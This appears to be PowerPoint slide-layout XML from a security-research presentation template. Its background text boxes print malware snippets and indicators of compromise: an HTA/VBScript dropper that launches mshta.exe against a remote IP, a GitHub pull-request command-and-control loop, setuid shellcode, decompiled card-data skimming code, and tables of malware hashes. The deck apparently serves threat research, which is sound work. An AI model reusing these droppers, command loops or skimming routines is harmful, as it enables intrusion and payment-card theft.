                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C85C96-9889-D2C3-0F17-02489DDCBB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5049464" y="-19591428"/>
            <a:ext cx="35440872" cy="35440872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3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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4233" name="Group 4232">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C9CA68-31DA-4929-A267-3E3569BA1415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9348493" y="7275719"/>
            <a:ext cx="2333414" cy="307778"/>
            <a:chOff x="7073680" y="1395747"/>
            <a:chExt cx="1452583" cy="191595"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4236" name="TextBox 4235">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D1983F-1DBB-6FEE-B6B1-51D68261C282}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7073680" y="1395747"/>
              <a:ext cx="48300" cy="957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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4237" name="TextBox 4236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368F2E6F-6E11-4BC1-3C47-B2E84AC0B2F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7194083" y="1395748"/>
              <a:ext cx="1332180" cy="19159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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>IOCTL_DISK_SET_DRIVE_LAYOUT_EX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89F02B8-BDB0-4B7E-6B5E-0CFC8A494A37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13946651" y="243822"/>
            <a:ext cx="3973806" cy="2418002"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1815"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="87CFD3">
                  <a:alpha val="15000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="5000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="8100000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508000">
              <a:srgbClr val="87CFD3">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="508000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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&lt;!DOCTYPE html&gt;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&lt;html&gt;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&lt;head&gt;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&lt;HTA:APPLICATION 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icon="#" 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WINDOWSTATE="minimize" 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SHOWINTASKBAR="no" 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SYSMENU="no" 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CAPTION="no" /&gt;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&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>vbscript</a:t>
            </a:r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"&gt;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On Error Resume Next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Set registered = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r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("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r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")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On Error Resume Next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87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>registered.Run</a:t>
            </a:r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"%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>windir</a:t>
            </a:r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%\system32\mshta.exe http://81.200.156.77/send/regular/02.03/rejoined.jpeg"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On Error Resume Next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Close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&lt;/script&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4290" name="TextBox 4289">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11A622BC-51EE-1C7D-B9D1-69951A912AD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8695474" y="9302896"/>
            <a:ext cx="7394700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E815A879F7F30FB492D4043F0F8C67584B869F32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scam.php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PHP/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HackTool.Telekopye.B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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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378699D285325E905375AF33FDEB3276D479A0E2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scam.php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PHP/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HackTool.Telekopye.B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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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242CE4AF01E24DB054077BCE3C86494D0284B781 	123.php 	PHP/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HackTool.Telekopye.A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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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9D1EE6043A8B6D81C328C3B84C94D7DCB8611262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mell.php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PHP/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HackTool.Telekopye.B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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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B0189F20983A891D0B9BEA2F77B64CC5A15E364B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neddoss.php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PHP/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HackTool.Telekopye.A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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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E39A30AD22C327BBBD2B02D73B1BC8CDD3E999EA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nscode.php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PHP/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HackTool.Telekopye.A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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
          <a:p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285E0573EF667C6FB7AEB1608BA1AF9E2C86B452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tinkoff.php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PHP/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HackTool.Telekopye.A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Telekopye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bot. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4252" name="Group 4251">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E15DF83-D99F-EFDE-A061-ECFF74587B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15304870" y="1370203"/>
            <a:ext cx="3303424" cy="277001"/>
            <a:chOff x="6945493" y="1520993"/>
            <a:chExt cx="2056428" cy="172437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4255" name="TextBox 4254">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D9C5F1B-CB42-8684-431A-8F824CDB23C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7073680" y="1520994"/>
              <a:ext cx="48300" cy="172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accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>C</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4256" name="TextBox 4255">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1AD9272-4C83-554E-52B6-8D20D8A53F19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7194082" y="1520993"/>
              <a:ext cx="1807839" cy="172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600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> disable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>FD9C17C35A68FC505235E20C6E50C622AED8DEA0</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>9CE1491CE69809F92AE1FE8D4C0783BD1D11FBE7</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4261" name="Rectangle 4260">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D41DB31-71DA-E682-2867-94342D6E38C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6945493" y="1520994"/>
              <a:ext cx="56921" cy="22410"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="39000">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4287" name="TextBox 4286">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FCF4B1-0C85-815B-5887-88086ACAF68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10893300" y="4393113"/>
            <a:ext cx="7394700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FD9C17C35A68FC505235E20C6E50C622AED8DEA0	108_100.exe	Win32/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Industroyer.B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	Industroyer2</a:t>
            </a:r>
          </a:p>
          <a:p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6FA04992C0624C7AA3CA80DA6A30E6DE91226A16	zrada.exe	Win32/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Agent.AECG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	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ArguePatch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:alpha val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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9CE1491CE69809F92AE1FE8D4C0783BD1D11FBE7	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pa.pay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	N/A	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TailJump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:alpha val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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0090CB4DE31D2D3BCA55FD4A36859921B5FC5DAE	link.ps1	PowerShell/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HackTool.Agent.AH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	Script which enumerates GPO</a:t>
            </a:r>
          </a:p>
          <a:p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D27D0B9BB57B2BAB881E0EFB97C740B7E81405DF	sc.sh	Linux/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Agent.PC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 trojan	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OrcShred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 (Linux worm)</a:t>
            </a:r>
          </a:p>
          <a:p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3CDBC19BC4F12D8D00B81380F7A2504D08074C15	wobf.sh	Linux/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KillFiles.C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 trojan	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AwfulShred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 (Linux wiper)</a:t>
            </a:r>
          </a:p>
          <a:p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8FC7646FA14667D07E3110FE754F61A78CFDE6BC	wsol.sh	Linux/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KillFiles.B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 trojan	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SoloShred</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:alpha val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4292" name="TextBox 4291">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D26BE1C-64B1-153C-BB7E-8361A6B483EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9653725" y="986407"/>
            <a:ext cx="3973806" cy="3536713"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1815"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="87CFD3">
                  <a:alpha val="15000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="5000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="8100000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508000">
              <a:srgbClr val="87CFD3">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="508000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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def run():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try: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g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Github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("REDACTED")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repo_owner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"REDACTED"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repo_name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"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Mycode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"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repo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g.get_user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repo_owner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).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get_repo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repo_name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base_branch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"main"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branch_name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"share-" + "".join(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genexpr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(range(6)))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head_branch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repo.create_git_ref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(ref="refs/heads/" +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branch_name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, sha=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repo.get_branch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base_branch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).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commit.sha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file_name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"_file.txt"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file_content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"This is a readme file."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file_path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branch_name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+ "/" +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file_name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRP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commit_message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"file"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repo.create_file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file_path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,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commit_message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,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file_content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, branch=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branch_name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title = "bingo#" + ID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now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datetime.now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body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get_body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pr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repo.create_pull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(title=title, body=body, head=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head_branch.ref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, base=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base_branch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excute_once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[]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while 1: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comments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pr.get_issue_comments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().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get_page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(0)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if comments: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    if comments[-1] not in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excute_once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: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latest_comment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comments[-1]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excute_once.append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latest_comment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        options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latest_comment.body.split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        command = options[0]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        if command == "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sh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":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            if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len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(options) &gt; 1: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        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pr.create_issue_comment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("```" + update("".join(options[1:])) + "```")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time.sleep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(10)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except Exception as e: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print(e)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099EC0-8145-DA75-14C4-C89864B05CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11952702" y="5467053"/>
            <a:ext cx="2614912" cy="3810613"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1815"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="87CFD3">
                  <a:alpha val="15000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="5000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="8100000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508000">
              <a:srgbClr val="87CFD3">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="508000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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exploit_payload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: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push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rdi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             ; DATA XREF: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main+CE'o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push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rsi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             ; main+11F'o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push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rax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xor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rax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,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rax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call    loc_6022F9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; -------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p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aUsrBinPerl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db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'/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usr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/bin/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perl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', 0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; -------------------------------------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loc_6022F9:                       ; CODE XREF: LOAD:00000000006022E61p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pop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rdi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mov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rsi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,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rax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mov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si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, 4755o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mov     al,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SYS_chmod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syscall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                     ; LINUX -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pop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rax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pop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rsi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pop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rdi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nop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nop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nop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nop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nop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nop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nop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jmp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rcx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BE150-6B94-6BD2-9FE2-B17D3402DD00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14946133" y="2675338"/>
            <a:ext cx="5060954" cy="7257711"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1815"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="87CFD3">
                  <a:alpha val="15000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="5000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="8100000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508000">
              <a:srgbClr val="87CFD3">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="508000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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130    act =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x_card_num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=");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131    v43 = 1;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132    if (!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"CVV2="))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133    {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134        v34 =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strcasestr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"cvv2=");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135        v35 = n;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136        if (v34 || (v43 == act != 0LL, v36 =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strcasestr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cvv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="), v35 = n, v36))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137        {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138            v11[v35 - 5] = 120;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139            v43 = 1;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140            v20 = *(const char **)(a1 + 1736);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141        }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142    }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143    if (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strcasestr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cardnum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") ||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strcasestr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ccnumber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"))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144    {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145        v11[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strlen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(v11) - 5] = 120;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146        v20 = *(const char **)(a1 + 1736);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147        v43 = 1;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148    }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149    if (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strcasestr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card_num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") ||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strcasestr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cc_number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"))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150    {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151        v11[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strlen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(v11) - 5] = 120;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152        v20 = *(const char **)(a1 + 1736);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153        v43 = 1;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154    }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155    if (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strcasestr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"card-num") || (v33 =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strcasestr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"cc-number"), v22 = v43, v33))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156    {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157        v21 =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strlen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(v11);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158        v22 = 1;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159        v11[v21 - 5] = 120;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160        v43 = 1;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161    }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162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na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= v22;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163    v23 =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curl_easy_init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164    if (v23 &amp;&amp;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na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)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165    {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166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strcpy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(v17, "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mkky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=13378;");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167        v27 = *(_QWORD *)(a1 + 1752);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168        v28 = 16368LL;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169        if (v27 &lt; 16368)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170            v28 = (int)v27;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171        ne = v28;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172        v29 =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strlen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(v17);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173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memcpy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(&amp;v17[v29], *(const void **)(a1 + 1736), ne);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174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CURLOPT_URL, (_DWORD)v11);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175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CURLOPT_WRITEFUNCTION, (unsigned int)sub_2E6F0);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176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CURLOPT_SSL_VERIFYPEER, 0);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177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CURLOPT_SSL_VERIFYHOST, 0);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178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CURLOPT_WRITEDATA, (unsigned int)&amp;v48);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>179        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>curl_easy_setopt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(v23, CURLOPT_USERAGENT, (unsigned int)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>BigBadWolf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>");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180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CURLOPT_CONNECTTIMEOUT, 2);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181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CURLOPT_TIMEOUT, 3);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182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CURLOPT_POST, 1);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183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CURLOPT_POSTFIELDS, (_DWORD)v17);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184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CURLOPT_NOSIGNAL, 1);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185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curl_multi_add_handle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(v9, v23);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="!!LIGHT-CRIMSON">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49532EA-3484-EF42-C258-198BA2B4422A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5531348" y="-14550864"/>
            <a:ext cx="30595660" cy="30595660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69000">
                <a:schemeClr val="accent4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0" name="!!SHAPE">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69981505-D3DA-5160-7E94-4195B44B7B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10273008" y="-1086525"/>
            <a:ext cx="20014372" cy="15151006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5937728 w 6691457"/>
              <a:gd name="connsiteY0" fmla="*/ 2573648 h 5065475"/>
              <a:gd name="connsiteX1" fmla="*/ 6039311 w 6691457"/>
              <a:gd name="connsiteY1" fmla="*/ 2514974 h 5065475"/>
              <a:gd name="connsiteX2" fmla="*/ 6656049 w 6691457"/>
              <a:gd name="connsiteY2" fmla="*/ 1791550 h 5065475"/>
              <a:gd name="connsiteX3" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY3" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX4" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY4" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX5" fmla="*/ 6656239 w 6691457"/>
              <a:gd name="connsiteY5" fmla="*/ 1790788 h 5065475"/>
              <a:gd name="connsiteX6" fmla="*/ 6483728 w 6691457"/>
              <a:gd name="connsiteY6" fmla="*/ 855719 h 5065475"/>
              <a:gd name="connsiteX7" fmla="*/ 6425082 w 6691457"/>
              <a:gd name="connsiteY7" fmla="*/ 754087 h 5065475"/>
              <a:gd name="connsiteX8" fmla="*/ 6366436 w 6691457"/>
              <a:gd name="connsiteY8" fmla="*/ 652455 h 5065475"/>
              <a:gd name="connsiteX9" fmla="*/ 5643355 w 6691457"/>
              <a:gd name="connsiteY9" fmla="*/ 35426 h 5065475"/>
              <a:gd name="connsiteX10" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY10" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX11" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY11" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX12" fmla="*/ 5642593 w 6691457"/>
              <a:gd name="connsiteY12" fmla="*/ 35235 h 5065475"/>
              <a:gd name="connsiteX13" fmla="*/ 4707967 w 6691457"/>
              <a:gd name="connsiteY13" fmla="*/ 207828 h 5065475"/>
              <a:gd name="connsiteX14" fmla="*/ 4606384 w 6691457"/>
              <a:gd name="connsiteY14" fmla="*/ 266502 h 5065475"/>
              <a:gd name="connsiteX15" fmla="*/ 753729 w 6691457"/>
              <a:gd name="connsiteY15" fmla="*/ 2491828 h 5065475"/>
              <a:gd name="connsiteX16" fmla="*/ 652146 w 6691457"/>
              <a:gd name="connsiteY16" fmla="*/ 2550502 h 5065475"/>
              <a:gd name="connsiteX17" fmla="*/ 35409 w 6691457"/>
              <a:gd name="connsiteY17" fmla="*/ 3273926 h 5065475"/>
              <a:gd name="connsiteX18" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY18" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX19" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY19" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX20" fmla="*/ 35218 w 6691457"/>
              <a:gd name="connsiteY20" fmla="*/ 3274688 h 5065475"/>
              <a:gd name="connsiteX21" fmla="*/ 207730 w 6691457"/>
              <a:gd name="connsiteY21" fmla="*/ 4209757 h 5065475"/>
              <a:gd name="connsiteX22" fmla="*/ 266376 w 6691457"/>
              <a:gd name="connsiteY22" fmla="*/ 4311389 h 5065475"/>
              <a:gd name="connsiteX23" fmla="*/ 325022 w 6691457"/>
              <a:gd name="connsiteY23" fmla="*/ 4413021 h 5065475"/>
